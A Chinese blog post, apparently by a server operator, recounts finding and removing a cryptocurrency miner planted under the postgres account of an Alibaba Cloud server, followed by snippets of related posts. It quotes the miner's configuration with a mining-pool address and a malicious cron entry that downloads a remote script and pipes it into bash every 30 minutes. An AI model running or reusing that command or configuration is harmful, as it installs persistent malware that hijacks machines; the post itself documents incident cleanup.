阿里云服务器被攻击,CPU被占满

最新推荐文章于 2025-04-11 18:57:28 发布
最新推荐文章于 2025-04-11 18:57:28 发布
阅读量1.6k 收藏 3
点赞数
文章标签: 服务器 阿里云 安全 cpu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43085094/article/details/122064395
版权

阿里云服务器被攻击,CPU被占满

cpu占用99.9%

这两天发现服务器上cpu一直是满负荷,查看了一下top发现是postgres的[ddns]占满了,网上搜了一下postgres的cpu占用问题,都说是sql查询的问题,可我sql都停了,没有查询,cpu还是占用接近99.9%,搜索ddns看看是什么也没查出来为什么cpu占用这么高。
切换postgres用户ps -ux查看该命令 ./[ddns] --config=./[ddns].pid
在这里插入图片描述
查了一下发现有个目录,里面有这个文件,(这时我还没发现是被攻击)

find / -name *ddns*

在这里插入图片描述

[ddns].pid.bak里面有个ip 194.147.114.20:45543

{
    "autosave": true,
    "background": true,
     "cpu": {
        "enabled": true,
        "huge-pages": true,
        "huge-pages-jit": false,
        "hw-aes": null,
        "priority": null,
        "memory-pool": false,
        "yield": true,
        "max-threads-hint": 70,
        "asm": true,
        "argon2-impl": null,
        "astrobwt-max-size": 550,
        "astrobwt-avx2": false,
        "cn/0": false,
        "cn-lite/0": false
    },
    "log-file":"/var/tmp/.../.ddns.log", 
    "opencl": false,
    "cuda": false,
    "pools": [
        
        { 
            "url": "194.147.114.20:45543"
        }
    ]
}

在网上用ip解析发现是瑞士
在这里插入图片描述
看了一下 往这个/var/tmp/…/.ddns.log 日志文件写了什么,意识到有可能被攻击了,网上查了一下,确定了是被攻击了

.ddns.log
在postgres用户下的crontab -l发现有个定时任务,定时获取一个a.sh
这样的话,就算kill -9 也没有用,它会定时恢复

*/30 * * * * /bin/curl -fsSL http://crypto.htxreceive.top/s3f815/a/a.sh | bash > /dev/null 2>&1

删除该用户下的crontab,如果你有其他的定时任务,用crontab -e 编辑

crontab -r

然后把/var/tmp/.crypto这个目录给删了,在kill掉哪个进程就可以了

查询authorized_keys是不是有自动登录的密钥
有的话删除掉这个用户还有这个文件

find / -name authorized_keys

大致原因我怀疑是我的postgres密码比较简单,因为它是在postgres用户下创建的

更详细的可以查看这位老哥的帖子
阿里云服务器被[crypto]攻击导致CPU爆满(已解决)

服务器遭受攻击CPU升高,流量升高,你一般如何处理
vivlol918的博客
08-23 1262
某些用户可能会故意滥用服务器资源,例如执行大量计算密集型任务、非法下载分享文件等。这些行为也会导致服务器负载升高、CPU占用率升高网络流量增加。
如何应对阿里云服务器被暴力破解的攻击
cooldream2009的博客
10-07 2850
随着云计算技术的快速发展,越来越多的企业个人用户选择将业务部署到云服务器上,然而,云服务器安全性问题却时刻威胁着用户的数据业务安全,尤其是暴力破解攻击。这类攻击通过不断尝试各种密码组合,最终获取服务器的控制权限。如果服务器的密码设置不当,攻击者很可能在短时间内入侵服务器,进而造成业务中断、数据泄露等严重后果。本文将详细介绍我在阿里云服务器上遭遇暴力破解攻击的经历,包括问题的发现、应对措施最终的解决方案,并提供一些防范此类攻击的建议,帮助用户提升云服务器安全性。
阿里云服务器CPU被陌生进程占满
zhsh5395的专栏
05-29 830
方法1:执行cd /var/spool/cron/ cat root 可以看到这行代码,删掉就好了 方法2:获取命令crontab -e查看定时任务
阿里云服务器攻击可以换别家防御吗
最新发布
m0_70754056的博客
04-11 130
高防IP通过转发云服务器的IP,隐藏源服务器的IP,黑客攻击只能攻击高防IP,而高防IP具有流量清洗过滤功能,能确保正常流量顺畅访问,像中云时代的高防IP最便宜100G起步,一个月仅2900元。具体操作也不难,先联系阿里云官方更换新的服务器IP,然后购买高防IP服务,将其新IP 域名 端口发给高防厂商配置,改解析就可以使用了,比如游戏业务购买高防IP,设置好转发的服务器端口,对外使用高防IP访问;不过,在选择第三方防御服务时,一定要谨慎,选择信誉好、口碑佳的服务商,以免上当受骗。
服务器攻击导致CPU100%的解决
过于丰富,无法简介
09-07 6253
排除服务器上是否有定时任务、顽固脚本等问题 top指令查看cpu占用情况: `` 尝试使用kill指令杀死对应进程,杀完之后发现对应服务依旧会重启: kill -9 pid 查看服务器进程数量,进程数量偏高确实存在问题: netstat -anp |grep tcp |wc -l 查看系统中存在的定时任务,定时任务与占用CPU最高的服务名称相同尝试关闭定时任务 crontab -l 修改定时任务的文件,删除定时任务保存。保存后发现还是会向服务中添加定时任务 crontab -e 直接停止定时任务进程
网站服务器突然满负载满,CPU占满,是被攻击了吗
dexunyun的博客
02-06 3107
随着互联网的发展,个人建站非常普遍,有的用户自己网站业务在正常运行中,网站被恶意攻击,也是时常有发生,一些个人或小型网站,由于没有专业的技术人员维护,一旦遭到攻击,网站就会瞬间瘫痪。 网站遇到攻击最多的就是CC攻击了,相信大家都应该有过这样的经历,就是在某网站举行活动的时候,大量人员同时访问这网站时,打开页面的速度会比以前较慢,当访问的人越多,数据库压力就越大,被访问的频率也越高,占用的系统资源也就越高。 CC攻击的原理就是攻击者模拟多个用户(多少线程就是多少用户)不停地进行访问那些需要大量数据操作(就
服务器CPU跑满?被攻击了?
smonai的博客
09-08 762
CC其实也是DDos攻击的一种,CC攻击是通过借助代理服务器模拟真实用户请求,实现DDOS伪装,通过制造大量的后台数据库查询动作来攻击页面,消耗目标资源,造成服务器宕机。 CC攻击的防护思路 1.部署架构 可将前端WAF或者负载均衡设备部署于HTTPS卸载器之后,从而实现对HTTPS流量的防护能力。 2.使用IP地址信誉库 对请求IP地址进行甄别过滤,阻止来自恶意IP的服务请求。 3.轻应用部署 应用部署时考虑页面静态比例,尽量让网站静态化,减少不必要的动态查询等方式,同时应急情况下可以
阿里云服务器被[crypto]攻击导致CPU爆满(已解决)
码出精彩
03-12 1693
阿里云服务器被[crypto]攻击导致CPU爆满1、查找哪个程序占用CPU高2、找到程序所在位置3、cd到程序所在目录,删除相关文件4、kill命令杀死进程 今天登录阿里云,看到自己的服务器CPU利用率爆满,然后阿里云又给我发了这个消息,我觉得我的阿里云服务器可能出问题了,于是在百度上找了很多资料,终于解决了,整理一下解决过程。下面是大神的链接。 https://blog.csdn.net/qq_34442563/article/details/103846133 1、查找哪个程序占用CPU高 使用t
阿里云服务器攻击危害有多大
xyyaq的博客
04-07 536
根据全球游戏全球移动互联网行业第三方分析机构Newzoo的数据显示:2017年上半年,中国以275亿美元的游戏市场收入超过美国日本,成为全球榜首。 游戏行业的快速发展、高额的攻击利润、日趋激烈的行业竞争,让中国游戏行业的进军者们,每天都面临业务安全的双重挑战。 游戏行业一直是竞争、攻击最为复杂的一个江湖。 曾经多少充满激情的创业团队、玩法极具特色的游戏产品,被互联网攻击的问题扼杀在摇篮里;又有多少运营出色的游戏产品,因为遭受DDoS攻击,而一蹶不振。 DDoS攻击的危害 小蚁安盾安全发布的20
阿里云服务器被挖矿程序侵入问题
samfaker的博客
08-23 1547
gitlab漏洞引起的无文件、无定时任务的挖矿程序解决方法
云计算系列之阿里云ECS服务器管理实战
sinat_30844883的博客
07-24 3662
服务器ECS(Elastic Compute Service)是阿里云提供的性能卓越、稳定可靠同时简单高效、处理能力可弹性伸缩的IaaS(Infrastructure as a Service)级别云计算服务。能够帮助用户快速构建更稳定、安全的应用,提升运维效率,降低IT成本,使用户更专注于核心业务创新。
解决Alibaba PC safe service 占用CPU过高的问题
qq_40515086的博客
03-22 1075
电脑没有运行什么程序,风扇时不时呼呼响,打开任务管理器发现是一个服务“alibaba pc safe service”在占用CPU。解决方法:先将服务程序alibaba pc safe service.exe强制解除占用,然后粉碎,最后将放有该程序的整个文件夹“AlibabaProtect”(地址一般为“C:\Program Files (x86)\AlibabaProtect”)权限全部设置为拒绝。
彻底告别Alibaba PC Safe Service:高CPU占用问题的终极解决方案
nntxthml的博客
10-11 8160
通过上述步骤,我们应该能够彻底删除Alibaba PC Safe Service,从而恢复系统的流畅运行。以管理员身份运行:在修改服务属性删除服务时,确保以管理员身份运行相关程序。耐心等待:在删除服务后,可能需要等待一段时间来确保Windows服务管理器更新其状态。因此,在重启电脑之前,不要急于删除残留文件。使用第三方工具:如果无法删除某些文件或文件夹,可以尝试使用第三方文件解锁工具来解锁它们。希望这篇文章能够帮助大家彻底摆脱Alibaba PC Safe Service的困扰,恢复系统的流畅运行。
阿里云服务器CPU跑满或抛高及带宽跑满怎样排查分析原因?(图文教程)
热门推荐
tianjinsong的专栏
09-18 1万+
https://www.wanweiwang.cn/FAQ/view/884.html 如果您使用阿里云服务器 ECS 时,若出现服务的速度变慢,或 ECS 实例突然断开,可以考虑服务器带宽 CPU 是否有跑满或跑高的问题。Linux 系统下,您可以按如下步骤进行排查: 定位问题。找到影响带宽 CPU 跑满或跑高的具体进程。 分析处理。排查影响带宽 CPU 跑满或跑高的进...
阿里云服务器cpu使用率一直100%,疑似中了病毒脚本
下雨了亦留此地的博客
10-13 782
参考文章 cpu使用率一直100% TCP 之 SYN_SENT状态 linux下查询进程对应文件 亲测有效 其它
关于window操作系统中出现svchost.exe 持续占用80%CPU问题解决方案
任飞
03-13 8841
写在前面 解决问题之前,首先要知道什么是svchost.exe,svchost.exe是一个属于微软Windows操作系统的系统程序,微软官方对它的解释是:svchost.exe是从动态链接库(DLL)中运行的服务的通用主机进程名称。这个程序对系统的正常运行是非常重要,而且使不能被结束的。简单的说没有这个服务机器几乎就是上不了网,很多应用服务都是以来于这个接口RPC,如果发现这个进程占用...
服务器啥也没跑cpu满了
恒创科技Henghost
05-24 675
服务器可能被恶意软件感染,这些软件可能会在后台运行,占用大量CPU资源。:您的服务器可能正受到DDoS攻击,这会消耗大量CPU资源。如果自己无法解决问题,可以联系云服务提供商的技术支持获取帮助。:应用程序可能存在资源泄露的问题,导致CPU使用率持续上升。:不正确的配置可能导致CPU资源的浪费。:系统内部错误可能导致CPU占用异常。
阿里云机器中毒
weixin_33807284的博客
03-09 308
昨天晚上收到阿里云的短信邮件,说服务器中毒,内容如下: 经检测您的云服务器(ip)存在恶意发包行为,为避免影响您服务器的正常使用,请您务必重视并尽快处理,需要您尽快排查您的安全隐患。目前系统不会处罚您的机器,但请您务必重视。 就怕被惩罚(近小黑屋),所以赶紧登录服务器,上去之后没发现什么异常,但是发现这台机器竟然一直是裸奔状态,赶紧安装...
释放阿里云服务器内存
02-26
### 如何释放阿里云ECS服务器内存 #### 诊断高内存占用原因 对于阿里云 ECS 实例,如果遇到内存持续升高的情况,首先应当排查是否存在异常进程。通过 `top` 或者 `htop` 命令能够实时监控 CPU 内存的使用状况[^2]。 ```bash top ``` 此命令会展示当前系统中最消耗资源的进程列表,包括 PID、USER、PR(优先级)、NI(nice value)、VIRT(虚拟内存用量)、RES(常驻集大小)、SHR(共享内存大小)、S(状态)、%CPU、%MEM 及 COMMAND 等信息。观察是否有不正常的程序正在运行并占据大量内存。 #### 终止不必要的服务应用程序 一旦确认某些特定的服务或应用造成了过多的内存负担,则应考虑停止这些非必要的组件来缓解压力。可以通过如下方式结束某个具体的进程: ```bash kill -9 <PID> ``` 这里的 `<PID>` 是指代目标进程ID,在前面提到过的 `top` 输出里可以看到每一行开头即为此值。不过需要注意的是强制终止可能会造成数据丢失或其他不良后果,因此建议先尝试优雅关闭再采取强硬措施。 另外,还可以利用 systemd 来管理系统服务的状态: ```bash systemctl stop <service_name>.service ``` 这有助于确保按照预期的方式停运指定后台作业而不影响其他依赖项。 #### 清理缓存文件其他临时对象 有时操作系统本身也会为了提高性能而预留一部分物理 RAM 作为缓冲区/高速缓存空间。虽然这部分不会真正妨碍到新请求分配所需的实际工作负载所需的存储位置,但在必要时仍然可以手动触发清理动作以腾出更多可用容量给更重要的任务调用。 执行同步写入所有未完成的数据至磁盘并将脏页刷新出去的操作: ```bash sync; echo 3 > /proc/sys/vm/drop_caches ``` 上述指令序列中的第二条语句告诉 Linux 内核丢弃所有的页面缓存(cache),回收那些被用来做读取加速用途却暂时闲置下来的区块;参数 "3" 表示清除全部三种类型的缓存——PageCache (0), dentries/inodes(1) Directory entries(2)[^1]。 #### 配置合理的SWAP分区 当实际使用的内存量接近甚至超过硬件配置所能提供的极限时,适当设置 SWAP 分区可以帮助防止因过度超载而导致整个机器变得极其缓慢乃至崩溃的情况发生。编辑 `/etc/fstab` 文件添加 swap 设备映射关系或者直接创建一个新的交换文件也可以实现相同的效果。 创建一个名为 `swapfile` 的大尺寸二进制流,并将其格式化成 Swap 类型后激活它: ```bash fallocate -l 4G /mnt/swapfile # 创建4GB大小的Swap文件 chmod 600 /mnt/swapfile # 设置权限只允许root访问 mkswap /mnt/swapfile # 初始化为Swap区域 swapon /mnt/swapfile # 启动新的Swap支持 echo '/mnt/swapfile none swap sw 0 0' | sudo tee -a /etc/fstab # 添加到启动加载表单以便下次开机自动生效 ``` 最后记得调整 vm.swappiness 参数控制内核倾向于何时开始使用该辅助性的虚拟内存机制,默认情况下其数值范围是从0到100之间变化,越低意味着更少地依赖于硬盘模拟RAM功能。 #### 定期维护与安全防护 鉴于之前遭遇过恶意软件感染的经历,定期进行全面的安全审查至关重要。安装防病毒工具以及启用防火墙都是不错的预防手段之一。同时保持系统的更新频率也很重要,及时修补已知漏洞可有效减少遭受攻击的风险概率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值